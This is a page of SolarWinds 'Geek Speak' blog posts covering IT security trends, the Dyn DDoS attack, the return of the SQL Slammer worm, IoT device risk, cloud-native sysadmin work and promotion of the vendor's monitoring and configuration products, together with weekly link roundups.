Skip navigation
1 2 3 4 Previous Next

Geek Speak

2,051 posts

For a long time there has been a bit of isolation between the person referred to as a network engineer and the security guy. The security guy is nice to have around because when all else fails, you can blame the firewall. That’s right. The network is fine, but you have to talk to the security guy. The security guy won’t tell you much. Why? Because in security you’re on a need-to-know basis, and you don’t need to know.

 

Alas, the point of this blog post is not to discuss the network and security silos and the way we point fingers at different departments. This is, in part, because there’s a shift that's been happening for some time now. Network engineers have been turning into security engineers. I think there are a few reasons for this shift. Let me explain.

 

Networking People Might Be Worried About Their Jobs

For the past several years, the fundamentals of networking as a career have shifted. In times past, the network engineer role dealt with cabling up equipment, connecting cables, drawing complex diagrams of the network, configuring various features and protocols via the command line, and testing and monitoring the network. With the advent of Software Defined Networking (SDN) and Network Function Virtualization, these things are quickly disappearing. There’s not much to physically connect now (at least not as much as before), and the network is building itself dynamically through the use of software tools, controllers, and so on.

 

Security Has Some Exciting Aspects that Challenge Network Engineers

It’s true that security elements like a firewall and an IPS can be set up using a controller, and that there’s a lot that software can do. However, there’s an aspect of forensics that adds an exciting aspect to network security that may be appealing to network engineers. As network automation takes more of a hold, network engineers are taking up coding and using languages like Python and such. Learning these languages actually helps in the transition to security. Decoding the activity of a would-be attacker and figuring out what their script does and how to put a stop to it is a mind exercise that’s appealing to network engineers.

 

Security Certifications Look Good on a Resume

Another fact that lends itself to the appeal is the fact that employers are looking for cybersecurity professionals, and there’s money in that work. Forbes said that there were 1 million cybersecurity jobs available in 2016. Information Week says that intrusion detection, secure software development, risk mitigation, cloud security, network monitoring and access management, security analysis, and data security skills are all in high demand. Putting these certifications on a resume increases your chances of landing a high-paying job in the security space.

 

So How Do I Keep Up?

It is true that it's hard to keep up these days. In this series of articles, I’ll tackle some areas that I think are helpful in breaking into the cybersecurity space as a network engineer. In the next article, I'll look at the mound of security certifications that are available, and discuss which ones are of most value. After that we will dive into the world of security in the social space. Believe it or not, there’s a large segment of security professionals that don’t engage in social communities like Twitter and Facebook. We’ll talk about why, and highlight some of the more vocal security folks out there. Then in our fourth post, I'll cover Cisco’s annual security report and why you should care to read it. Finally, we’ll wrap up the segment by discussing the transition into a security role and where to go from there.

 

I look forward to the comments and perhaps even questions that I can address in these future articles. Until then, happy labbing!

This week's Actuator is coming to you from Darmstadt, Germany, where I am attending the SQL Konferenz. I had one session yesterday and will be delivering another one tomorrow. So, there's still time to make your way over to Darmstadt and talk data with me and datachick

 

As always, here's a bunch of links I found on the Intertubz that you may find interesting. Enjoy!

 

How to Spot Visualization Lies

Because people, and statistics, can sometimes stretch the truth, articles like this are a good reminder for everyone to ask questions about their data.

 

Zuckerberg shows off Oculus gloves for typing in VR

Including this because the real point is buried at the bottom: "Oculus will close 200 of its 500 demo stations inside Best Buy stores, after some stations went days without use." Maybe Oculus should focus on why people have lost interest in their product. I'm guessing it wasn't because they needed gloves.

 

Visual Studio 2017 Arrives On March 7

A big milestone for Microsoft is right around the corner. I can recall when I first opened up Visual Studio for the first time in order to create some ASP.NET applications. Can't believe it's been 20 years.

 

A rash of invisible, fileless malware is infecting banks around the globe

Oh, joy. Hey, maybe we'll get lucky and it will add money to our accounts.

 

Who's watching who? Vizio caught spying, FTC says

I am someone that doesn't mind the collecting of anonymous data in an effort to make products and services better for customers. But what Vizio did here was awful. Not only was this done without consent, the data was not anonymous, and Vizio made money by selling this data to other parties. And as I sit here typing this all I can think about is how Vizio is just a company that got caught, there are likely many more examples out there that we don't know about.

 

Oracle Settlement Puts Focus on Cloud Revenue Claims

I wish I could say I'm shocked that Oracle would resort to such tactics, but then I remembered they once told everyone how their database was "unbreakable," and called SQL Server In-Memory OLTP "vaporware." So yeah, the details of this case aren't that surprising.

 

WordPress Bug Allows Hackers to Alter Website Content

Including this as a warning to anyone out there running WordPress: you should update to the latest build before you get hacked. I noticed a handful of blogs last week had been defaced.

 

One thing I enjoy about visiting Germany is seeing how they solve problems in unique ways:

 

LJJX4885.jpeg

You may be a Network Administrator for a small law office, or a quiet small-town school district, or even a midsize enterprise with three or four offices scattered throughout a relatively small geographical area. Have you ever stopped and wondered if a cyber-attack was something you had to be concerned with? You’re not a high value target, right? Not a major financial institution, an ISP, a high profile cloud service provider, or any kind of organization that someone would want to target with an attack, so it can’t (or won’t) happen to you, right?

 

Perhaps. You might go your entire career without having experienced the crippling impact of a DDoS attack on your infrastructure, or you might learn the hard way that even the most inconspicuous network can be prone to the ripple effect some of these attacks can generate.

 

"The Internet is a series of tubes..." - the famous quote by former United States Senator Ted Stevens, gave an interesting (if incorrect) laypersons perspective on what the Internet was. What it didn't do was highlight the complexity of the interconnections, and how, despite how enormous it is, everything within it is closely related. Six degrees of the Internet, maybe?

 

The recent attack on Dyn is the perfect example of this. While your network may not have been the actual target of that attack, if you were a Dyn customer, you certainly felt its effects. External services, websites, email, etc. that relied on Dyn for DNS, all intermittently reachable. Seemingly, random websites reported as down or unreachable. No indications of a problem on your own infrastructure, links aren’t saturated, and no packet loss or latency found.

 

Then the news finally reaches you, maybe a Tweet, or someone in a Slack channel posts a link to a report of the problem. The news spreads of an ongoing attack on a major DNS provider...your DNS provider. Now it all makes sense, and now, you are officially he victim, albeit indirectly, of a massive DDoS attack.

 

Don't feel too bad. Other victims included Twitter, Spotify, and Reddit, among thousands of others.

 

While you may not be a high-value target, some of the critical services you rely on are. Especially as these attacks continue to exploit and target simple services, lower down in the stack. Things like DNS, FTP, and NTP. Services almost all networks rely on to a certain degree, and are common enough to be able to cripple almost anywhere, and anytime, with far-reaching impact.

 

Nobody is safe. (Queue dramatic music)

 

That is a huge flaw in something so intrinsic to our daily lives, both personally and professionally. We rely on our networks and the Internet, and when something so simple can interrupt service, it highlights some major problems with the foundation of what we have built.

 

So, the Internet is broken. Who (or what) is going to fix it?

 

Can it be fixed?

By Joe Kim, SolarWinds Chief Technology Officer

 

In the past, cybersecurity threats were thought to come solely from malicious activity outside an organization, so agencies focused on protecting sensitive information from foreign governments, hackers, and more. Today, however, careless or untrained employees are just as dangerous to network security as malicious threats.

 

In fact, according to the results of SolarWinds' third annual federal Cybersecurity Survey, 48 percent of federal IT pros cited careless or untrained insiders as one of the greatest sources of IT security threats to their agency -- the third consecutive year (2014-2016) insider threats topped the list.  Most recently those insiders tied foreign governments as the greatest security threat for federal agencies. Many security breaches were also reported to have been caused by human error, phishing, and malware.

 

Sources of security threats

 

 

2014

2015

2016

Careless/untrained insiders

42%

53%

48%

Foreign governments

34%

38%

48%

General hacking community

47%

46%

46%

 

For federal security pros, this means that protecting the network has become much harder. Not only must agencies continue to mitigate threats from foreign governments and hacktivists, but they must also protect the network from agency personnel, which can be a far more unpredictable challenge.

 

Expecting the unexpected

 

User error is nothing new. Federal IT pros have been dealing with this since the first bits passed over the first pulled wires. The challenge is that careless users are not getting any more careful, yet the information and data they can access has become much more personal and, in some cases, critical to the agency mission.

 

What’s the solution? While there is no one single answer, federal IT pros have found that a combination of products presents a formidable security barrier. In fact, most respondents to the aforementioned survey said they use an average of five different tools in conjunction to get the job done. Among the most valuable solutions cited were:

 

  • Smart card/common access card
  • Identity and access management
  • Patch management
  • Configuration management
  • Security information and event management (SIEM)
  • Web application management

 

Of these tools, users reported the following three as being particularly effective:

 

  1. Patch management software decreased the time to detect and respond to IT security incidents. Agencies using patch management software are far more likely to detect -- within minutes -- rogue devices, denial of service attacks and unauthorized configuration changes.
  2. Configuration management software also cut response time for security incidents.
  3. SIEM tools helped agencies detect phishing attacks within minutes as well as almost all threats presented within the survey.

 

At the end of the day, federal IT pros understand that users will not change, and threats will continue to escalate. The solution is to evolve agency IT security practices to expect the unexpected and implement the most effective combination of tools to create the strongest security posture possible.

 

Find the full article on Government Computer News.

You shouldn't be running unpatched versions of SQL 2000. That's what you need to know.

 

First reported back in 2002, the SQL Slammer virus caught fire in January of 2003, and spread worldwide. It wasn't much more than a nuisance—it merely propagated itself and brought networks to a crawl. The worm could have done much more damage, considering that many of those same instances had blank 'sa' passwords (by default!).

 

But all of that is in the past. Here's what you need to know about SQL Slammer today.

 

First, this worm infects unpatched SQL 2000 and MSDE instances only. About a week ago, I would have thought that the number of such installs would be quite small. But the recent uptick in Slammer tells me that there are enough of these systems to make Slammer one of the top malware detected at the end of 2016. And a quick search at Shodan shows thousands of public-facing database servers available. And if you want to have some real fun at Shodan®, Ian Trump (phat hobbit ) has a suggestion for you.

 

Second, old worms never die; they get saved and re-used every now and then by attackers. Some software vendors get a bit lazy, maybe even have some hubris in thinking they don't need to protect themselves from old attack vectors. Attackers know that vendors are maybe lazy, so they will routinely try old exploits just to see what they can find. Right now, they are finding a bunch of unsecured instances of SQL 2000. This does beg the question: "why?" Perhaps they are just poking around in an effort to distract us from something else. Or maybe they are delivering a modified payload we don't know about yet. With so many legacy systems out there, it's hard to tell what is the real target.

 

Third, it's quite possible we are simply seeing IoT devices (or vending machines, maybe POS devices, or remote kiosks in industries like healthcare), which are running older versions of MSDE. Perhaps a vendor thought "hey, I can use this old version of MSDE for free" and shipped a few thousand units in the past year, and now suddenly we see the Slammer attack uptick. This may not be a targeted attack... yet. But it almost certainly has been noticed as a possible attack vector by now.

 

Here's what you can do right now.

 

  1. Stop using old software. Yes, I know that the software works. And it's cheap. It's also less secure than you might think. Slammer is just one of the known holes. Imagine the number of holes we haven't learned about yet.
  2. Patch the software you do have. I know companies like to hold off on patching systems for a period of time. Microsoft® issued a patch for Slammer a full six months before the attacks really started. There's no excuse for any company to have waited so long to apply the patch.

  3. Read this security bulletin. It's old, but it provides details on the Slammer worm, how it works, and what it can do to your systems.
  4. Review your use of firewalls, ACLs, and default ports. Do everything you can do to limit your exposure. Even if you can't upgrade to newer versions of SQL, or patch the one you have, you can use other methods to minimize your risk of a breach.

 

Lastly, I will leave you with this thought from Ian in an email exchange we had regarding this post:

 

"It’s no coincidence this attack is taking place, as there recently was exploit code for a Windows® SMB attack; perhaps the return of “The Slammer” is a great way to identify at-risk, legacy systems, which a myriad of unpatched Windows® exploits exist for. It’s unlikely you are running SQL 2000 on Windows® Server 2016—great way to get a nice list of targets if the spread of “The Slammer” has a command and control element identifying who’s been infected."

 

There's a lot of bad actors out there. Don't think your public-facing database server isn't at risk. Any piece of information you provide to a hacker allows them to learn ways to possible attack someone else.

 

We are all in this together.

kong.yang

Don’t Be an IT Seagull!

Posted by kong.yang Employee Feb 10, 2017

What’s an IT seagull? An IT seagull is a person who swoops into projects, takes a dump on everything, then flies off, leaving the rest of the team to clean up the mess. We all know an IT seagull. They tend to be in management positions. Heck, we might even be guilty of being IT seagulls ourselves every once in a while. So how does one prevent IT seagulls from wreaking havoc on mission-critical projects?

 

First, stick to the data – specifically, time series data that can be correlated to root cause issues. The key to troubleshooting is to quickly surface the single point of truth to eliminate the IT blame game. This effectively nullifies IT seagulls with data that clearly shows and correlates cause and effect.

 

Second, collaboration tends to deter IT seagulls. Being able to share an expert’s point of view with another subject matter expert to give them specific insights to the problem is powerful when you are trying to quickly remediate issues across multiple stacks because it allows decisive action to take place.

 

Third, by focusing on the connected context provided by time series data that cuts across the layers of the entire stack, teams can eliminate the IT seagull’s negative potential, even as they are busy dropping gifts that keep on giving from the skies.

 

Do you know any IT seagulls? Share your stories and how you overcame them in the comments below.

In part one, I outlined the differentiations between a traditional architecture and a development oriented one. We’ve seen that these foundational and fundamental differences have specific design approaches that really can significantly impact the goals of a team, and the approaches of the sysadmin to support them. But, what we haven’t addressed are some of the prerequisites and design considerations necessary to facilitate that.

 

Let me note that DevOps as a concept began with the operations team creating tools within newer scripting and programming languages all centered around the assisting of the facilities and sysadmin groups to support the needs of the new IT. Essentially, the question was: “What kinds of applications do we in the infrastructural teams need to better support the it needs as a whole. Many years ago, I had the great pleasure to work on a team with the great Nick Weaver ( @LynxBat ). Nick had an incredible facility to imagine tools that would do just this. For example, if you’ve a requirement to replicate an object from one data center to another, which could be a simply Push/Get routine, Nick would tell you that you’re doing it wrong. He’d create a little application which would be customized to accomplish these tasks, verify completion, and probably give you a piece of animation while it was taking place to make you feel like you’re actually doing something. Meanwhile, it was Nick’s application, his scripting, that was doing all the heavy lifting.

 

I’ll never underestimate, nor appreciate the role of the developer more than the elegance with which Nick was able to achieve these things. I’ve never pushed myself to develop code. Probably, this is a major shortfall in my infrastructural career. But boy howdy, do I appreciate the elegance of well written code. As a result, I’ve always leaned on the abilities of my peers who have the skills in coding to create the applications that I’ve needed to do my job better.

 

When a sysadmin performs all of their tasks manually, no matter how strong the attention to detail, often, mistakes get made. But when the tools are tested, and validated, running them should be the same across the board. If some new piece of the infrastructure element must be included, then of course, the code must know about it, but still, the concept remains. 

 

So, in the modern, Cloud Based, or even Cloud Native worlds, we need these tools to keep ourselves on-top of all the tasks that truly do need to be accomplished. The more that we can automate, the more efficient we can be. This means everything from deploying new virtual machines, provisioning storage, loading applications, orchestration of the deployment of applications toward cloud based infrastructures (Either hybrid, on premises, or even public cloud based). In many cases, these framework types of orchestration applications didn’t exist. To be able to actively create the tools that would ensure successful deployments has become mission critical.

 

To be sure, entirely new pieces of software are often created that are now solving these problems as they arise, and many of these are simple to use, but whether you buy something off the shelf, or write it yourself, the goals are the same. Help the poor sysadmin to do the job they want to do as seamlessly, and efficiently as possible.

Getting ready to head to Germany and SQL Konferenz next week. This will be the fourth consecutive year for me at SQL Konferenz. I enjoy the event and visiting Darmstadt, home of the European Space Agency. (Canada is a member of the ESA despite not being in Europe, and they say Americans are geographically challenged, but whatevs). This year I will have two sessions. Together with Karen López datachick, we will be offering a full training day session on February 14th titled “Advanced Accidental Database Design for SQL Server." The other session I have is on February 16th and is titled “Upgrading to SQL Server 2016." If you do attend, please stop by and say hello and ask me about the Super Bowl.

 

As always, here's a bunch of links I found on the Intertubz that you may find interesting. Enjoy!

 

Hunting for evidence, Secret Service unlocks phone data with force or finesse

Never mind getting Apple to help unlock a phone; the government can always just take it apart if needed.

 

After a decade of silence, this computer worm is back and researchers don't know why

Ah, memories. I recall when and where I was when I found out Slammer had made its way inside our systems. The classics always find their way back.

 

Just One in Four Banks Confident of Breach Detection

The real number is probably closer to zero than one. And I don't want my bank to just detect a breach, I want them to prevent a breach.

 

The Midlife IT Career Crisis

I found this interesting enough to share with anyone that has 15+ years in IT already and is noticing all the new shiny things being used by those darn kids coming out of college.

 

Compliance as code

This is one of those things that sounds great in theory, but not so great in practice. Humans will always find a way around the rules. Always.

 

Ransomware Freezes Eight Years of Police Evidence

This ransomware business will get worse before it gets better.

 

I'm not saying that the only reason I go to Germany is for the schweinshaxe, but it's near the top of the list:

 

IMG_1986.JPG

By Joe Kim, SolarWinds Chief Technology Officer

 

There is hardly a government IT pro who has not seen sluggish applications create unhappy users.

 

Because the database is at the heart of every application, when there’s a performance issue, there’s a good chance the database is somehow involved. With database optimization methods—such as identifying database performance issues that impact end-user response times, isolating root cause, showing historical performance trends, and correlating metrics with response time and performance—IT managers can speed application performance for their users.

 

Start with these four database optimization tips:

 

Tip #1: Get visibility into the entire application stack

The days of discrete monitoring tools are over. Today’s government IT pros must have visibility across the entire application stack, or the application delivery chain comprising the application and all the backend IT that supports it (software, middleware, extended infrastructure and especially the database). Visibility across the application stack will help identify performance bottlenecks and improve the end-user experience.

 

Tip #2: See beyond traditional infrastructure dashboards

Many traditional monitoring tools provide a dashboard focused on health and status, typically featuring many hard-to-interpret charts and data. In addition, many of these tools don’t provide enough information to easily diagnose a problem, particularly a performance problem.

 

Tools with wait-time analysis capabilities can help IT pros eliminate guesswork. They help identify how to execute an application request step-by-step and will show which processes and resources the application is waiting on. This type of tool provides a far more actionable view into performance than traditional infrastructure dashboards.

 

Tip #3: Reference historical baselines

Database performance is dynamic. It is critical to be able to compare abnormal performance with expected performance. By establishing historic baselines of application and database performance that look at how applications performed at the same time on the same day last week, and the week before that, etc. , it is easier to identify a slight variation before it becomes a larger problem. And, if a variation is identified, it’s much easier to track the code, resource or configuration change that could be the root cause and solve the problem quickly.

 

Tip #4: Align the team

An entire stack of technologies supports today’s complex applications. Despite this, most IT operations teams are organized in silos, with each person or group supporting a different part of the stack. Unfortunately, technology-centric silos encourage finger pointing.

 

A far more effective approach shares a unified view of application performance with the entire team. In fact, a unified view based on wait-time analysis will help ensure that everyone can focus on solving application problems quickly.

 

Remember, every department, group, or function within an agency relies on a database in some way or another. Optimizing database performance will help make users happier across the board.

 

Find the full article on Government Computer News.

In traditional IT, the SysAdmin’s role has been established as supporting the infrastructure in its current dynamic. Being able to consistently stand up architecture in support of new and growing applications, build test/dev environments, and ensure that these are delivered quickly, consistently, and with a level of reliability such that these applications work as designed is our measure of success. Most SysAdmins with whom I’ve interacted have performed their tasks in silos. Network does their job, servers do theirs, and of course storage has their unique responsibility. In many cases, the silos worked at cross purposes, or at minimum, with differing agenda. The rhythms of each group caused for, in many cases, the inability to deliver the agility of infrastructure that the customer required. However, in many cases, our systems did work as we’d hoped, and all the gears meshed properly to ensure our organization’s goals were accomplished.

 

In an agile, cloud native, devops world, none of these variables can be tolerated. We need to be able to provide the infrastructure to deliver the same agility to our developer community that they deliver to the applications.

 

How are the applications different than the more traditional monolithic agencies for which we’ve been providing services for so long? The key here is the concepts of containers and micro-services. I’ve spoken of these before, but in short, a container environment involves the packaging of either the entire stack or discrete portions of the app stack which is not reliant necessarily on the operating system or platform on which they sit. In this case, the x86 service is already in place, or can be delivered in generic modes on demand. The application or portions of it can be deployed as the developer creates it, and alternately, removed just as simply. Because there is so much less reliance on the virtually deployed physical infrastructure, the compute layer can be located pretty much anywhere. Your prod or dev environment on premises, your hybrid cloud provider, or even the public cloud infrastructure like Amazon. As long as the security and segmented environment has been configured properly, the functional compute layer and its location are actually somewhat irrelevant.

 

A container based environment, not exclusively different than a MicroServices based one, delivers an application as an entity, but again, rather than relying on a physical or virtual platform and its unique properties, can sit on any presented compute layer. These technologies, such as Kubernetis, Docker, Photon, Mesosphere and the like are maturing, with orchestration layers and delivery methods far more friendly to the administrator than they’ve been in the past.

 

In these cases, however, the application platform being delivered is much different than traditional large corporate apps. An old Lotus Notes implementation, for example, required many layers of infrastructure, and in many cases, these types of applications simply don’t lend themselves to a modern architecture. They’re not “Cloud Native.” This is not to disparage how Notes became relevant to many organizations. But the value of a modern architecture, the mobility of the applications, and data locales simply does not support the kinds of infrastructure that an SAP, JDEdwards, etc. type of monolithic architecture required. Of course, these particular applications are solving the cloud issues in different ways, and are still as vital to their organizations as they’d been in the past.

 

In the following 4 blog postings, I’ll address the architectural/design/implementation issues facing the SysAdmin within the new paradigm that Cloud Native brings to the table. I hope to address those questions you may have, and hope for as much interaction, clarification, and challenging conversation as I can.

At Tech Field Day 13, we gave everyone a sneak peek at some of the cool features we’ll be launching in March. If you missed the sneak peak, check out the footage below:

 

 

Our PerfStack Product Manager has also provided a detailed blog post on what you can expect from this cool feature. In the near future, look for the other Product Managers to give you more exclusive sneak peeks right here on THWACK.

 

Join the conversation

We are curious to hear more about what you think of PerfStack. After all, we used your requests to build this feature. With that said, I’ve seen several requests in THWACK expressing what you need from an Orion dashboard. I would love to hear from those of you directly in the IT trenches, specifically some ideas on how you would manipulate all this Orion data with PerfStack.

 

Personally, I would use PerfStack to visually correlate the page load times in synthetic transactions as observed by WPM with web server performance data in WPM and network latency from NetPath, and maybe storage performance from SRM to get a better understanding of what drives web server performance and what is likely to become a bottleneck that may impact end user experience if load goes up. But we want to hear from you.

 

If you had access to PerfStack right now, what would you do with it?

What interesting problems could you solve if you could take any monitoring object from any node that you are monitoring with Orion? What problems would you troubleshoot? what interesting use cases can you imagine? What problems you are facing today would it help you solve?

 

Let us know in the comments!

 

In Geek Speak(TM), THWACK(R) MVP Eric Hodeen raised the concern that networks are increasingly becoming vulnerable to outdated network devices like routers and firewalls, and even IoT devices now making their way into the workplace. (See Are Vulnerable Routers and IoT Devices the Achilles Heel of Your Network?) The reason, he writes, is that these devices are powered by lightweight and highly specialized operating systems that are not hardened and don’t always get patched when vulnerabilities are discovered. Eric then goes on to give several recommendations to defend against the risks these devices pose. In closing his article, Eric reminds us that security defenses rest on a combination of technical and procedural controls and that there is a direct correlation between configuration management and security management. He then makes the assertion that “perhaps one of the best security tools in your toolbox is your Network Configuration and Change Management software.” We couldn’t agree more. 

 

It’s for this very reason that Network Configuration Manager (NCM) continues to receive so many industry security awards. In late 2016, SolarWinds(R) NCM received two noteworthy awards for security management.

In November, SC Magazine recognized NCM as a 5-star “Best Buy” for Risk and Policy Management. In recognizing NCM, SC Magazine said:

 

“Simple to deploy, very clean to use, and SolarWinds’ decades of experience with internet-working devices—especially Cisco(R) —really shows.” 

 

  You can read the full article here

 

In December GSN recognized SolarWinds NCM as the Best Compliance/Vulnerability Assessment Solution as part of its 2016 Homeland Security Award. The GSN Awards are designed to recognize the most innovative, important technologies and strategies by U.S. and International IT and Cybersecurity companies, Physical Security companies, and Federal, State, County and Municipal Government Agencies. 

 

You can review all GSN award winners here

 

Network security and compliance is a never-ending job. Bad actors devise new hacks, new software mean new vulnerabilities, and network changes bring new security controls. Manually doing everything needed to make your network secure and compliant no longer works. This is where NCM can help you to: 

 

  • Standardize configurations based on policy
  • Immediately identify configuration changes
  • Create detailed vulnerability and compliance reports
  • Remediate vulnerabilities and policy violations

 

Using NCM is like having an experienced security engineer on staff.  So don’t just do the work of network security and compliance—automate it using NCM to get more done.  

To learn more or to try NCM for 30 days, please visit the NCM product page.

 

Do you use NCM to improve your network security and compliance?  Share your story below.

Recent news headlines report alarming intrusions into otherwise strong, well-defended networks. How did these incursions happen? Did perpetrators compromise executive laptops or critical servers? No, these highly visible endpoints are too well defended. Instead, hackers targeted low-profile, low-value network components like overlooked network routers, switches, and Internet of Things (IoT) devices.  

 

Why are network and IoT devices becoming the target of choice for skilled hackers? Two reasons. First, vendors do not engineer these devices to rigorously repel intruders. Unlike servers and desktops, the network/IoT device OS is highly specialized, which ironically may make it more difficult to secure. However, vendors do not make the effort to harden these platforms. Second, these devices are out of sight and out of mind. As a result, many of them may be approaching technical obsolescence and are no longer supported.

Many of us remember recently how the Mirai IoT botnet compromised millions of Internet-enabled DVRs, IP cameras, and other consumer devices to launch a massive distributed denial-of-service (DDoS) attack against major DNS providers to “brown out” vast regions of the internet. For many, this attack was simply an inconvenience. However, what if IoT devices or weakly defended routers and switches were compromised in a way that impacted our offices, warehouses, and storefronts? We can easily see how weak devices are targeted and compromised to disrupt commercial operations. Many companies use outdated routers, switches, and weakly secured IoT devices. So how do we protect ourselves?

 

One solution is to forbid any outside electronics into the workplace, which is my vote, though I know this is increasingly unrealistic. But “where there is a will there is a waiver” is a common response I hear. A second solution is to retire old hardware and upgrade firmware containing verified vulnerabilities. Another approach would be to design, build, and implement a separate network access scheme to accommodate IoT devices so they do not interfere with corporate network productivity. Once this network is operational, then it is the job of the corporate technology engineers and security to ensure they are used in an appropriate manner. To complement these strategies, it’s helpful to have mature change management processes, a network configuration, and a change management (NCCM) solution with EOL, vulnerability assessment, and configuration management capabilities. 

 

Fortunately, these solutions are straightforward. By using a combination of technical and procedural controls, you can alleviate much of the risk. There is a direct correlation between configuration management and security management. So in reality, one of the best security tools in your toolbox is your network configuration and change management software. Using the right tools and taking deliberate and sensible steps can go a long way to keep your company out of the headlines.

 

About the author

Eric Hodeen is a Solarwinds expert and THWACK MVP with over 20 years’ experience in network engineering with expertise in network management and operations and STIG, PCI and NIST compliance.  Eric has designed, implemented and managed networks for the Department of Defense across the US and Europe.  He earned his MS Management of Technology with a specialization in security from the University of Texas at San Antonio and holds numerous certifications including Cisco CCNA R&S, CCDA, CCNA Security, CCNP Security, Juniper JNCIA/JNCIS, ITIL V2, Security+CE and COMPTIA CASP.

By the time you read this, I will already be in Austin for Tech Field Day #13 hosted at SolarWinds. I am looking forward to attending my first ever TFD, after having virtually attended some of the previous events. I enjoy learning from the best industry experts and TFD allows for that to happen.

 

As always, here's a bunch of links I found on the Intertubz that you may find interesting. Enjoy!

 

Trump aides' use of encrypted messaging may violate records law

Leave it to our government to decide that encrypting messages somehow means they can't be recorded, despite the fact that industries such as financial services have been tracking encrypted messages for years due to SEC rules.

 

A Quarter of Firms Don’t Know if They’ve Been Breached

That number seems low. I think it's closer to 100%, because even firms that know they have been breached likely have no idea about how many breaches they have suffered.

 

Why security is best in layers

And here's the reason companies have no idea if they have been breached: they don't have the right talent in-house to discover such things. Identifying a breach takes more than just one person—it requires analysis across teams.

 

Microsoft Almost Doubled Azure Cloud Revenue Last Quarter

Articles like this remind me about the so-called "experts" out there a few years back who were dismissing the cloud as anything worthwhile. And maybe, for some workloads, it isn't. But there is one thing the cloud is right now, and that's a cash cow.

 

Monday Vision, Daily Outcomes, Friday Reflection for Remote Team Management

A must read for anyone working remotely. I've done a similar weekly report in the past, listing three things I did, three things I want to do next week, and three roadblocks.

 

Why your voice makes you cringe

Listening to me speak is awful. I don't know how anyone does it, TBH, let alone watch me.

 

Should the cloud close the front door to the database?

Why is this even a question? As a host, they MUST protect everyone, including the ill-informed customer. If the host left security up to the customer, the cloud would collapse in days.

 

Booted up in 1993, this server still runs—but not for much longer

If you replace 20% of the hardware components for a server, is it the same server as when it started? Never mind the philosophical question; this is quite a feat. And yes, I did think of Battlestar Galactica, and how the lack of upgrades proved to be the thing that saved it from destruction. I'm hoping they never turn this thing off.

 

A quick image from a flight last week—somewhere over Hoth, apparently:

hoth.jpg

By Joe Kim, SolarWinds Chief Technology Officer

 

Before last year, I bet you never gave a second thought to Alexander Hamilton. However, a popular musical has brought the United States’ first Secretary of the Treasury to center stage.

 

Hamilton had some really great quotes. Here’s one of my favorites: “Safety from external danger is the most powerful director of national conduct.”

 

Hamilton wasn’t talking about cybersecurity, but his words are nevertheless applicable to the subject. As threats multiply and gain complexity, federal IT professionals are feeling the pressure and must take measures to protect their agencies from external danger.

 

Last year, my company, SolarWinds, issued the results of a cybersecurity report and survey that ascertained the level of concern amongst federal IT administrators about growing threats. Out of 200 government IT professionals surveyed, forty-four percent mentioned threat sophistication as the number one answer to why agencies are more vulnerable today, while twenty-six percent noted the increased volume of threats as their primary concern.

 

Hamilton would tell you to take the bull by the horns. Agency IT administrators should take a cue from old Alex and adopt ways to address their concerns and fight back against threats.

 

The fight for independence… from bad actors

 

Every successful fight begins with a strategy, and strategies typically begin with budgets. As these budgets continue to tighten, agency personnel must continue to explore the most cost-effective options.

 

Software acquisition can be more efficient and budget friendly. Agencies can download specific tools at lower costs. Further, these tools are typically designed to work in heterogeneous environments. These factors can help IT managers cut through red tape while saving money.

 

The right to bear software

 

No revolution can be won without the proper tools, however. Thankfully, the tools that IT managers have at their disposal in the fight against cyber threats are numerous and powerful.

 

The primary weapon is security information and event management (SIEM) software. Automated SIEM solutions can help managers proactively identify potential threats and react to them as they occur. Agencies can monitor and log events that take place on the network—for instance, when suspicious activity is detected from a particular IP address. Administrators can react by blocking access to a user or device, or identifying and addressing policy and compliance violations.

 

These solutions have been successful in helping agencies detect and manage threats. According to our survey respondents, users of SIEM software are better able to detect, within minutes, almost all threats listed on the survey. Other tools, such as configuration management software that lets managers automatically adjust and monitor changes in network configurations, have also proven effective at reducing the time it takes to respond to IT security incidents.

 

Hamilton once said “a promise must never be broken.” The promise that federal IT managers must make today is to do everything they can to protect their networks from mounting cybersecurity threats. It’s certainly not an easy task, but with the right strategies and tools, it might very well be a winnable battle.

 

Find the full article on GovLoop.

Filter Blog

By date:
By tag: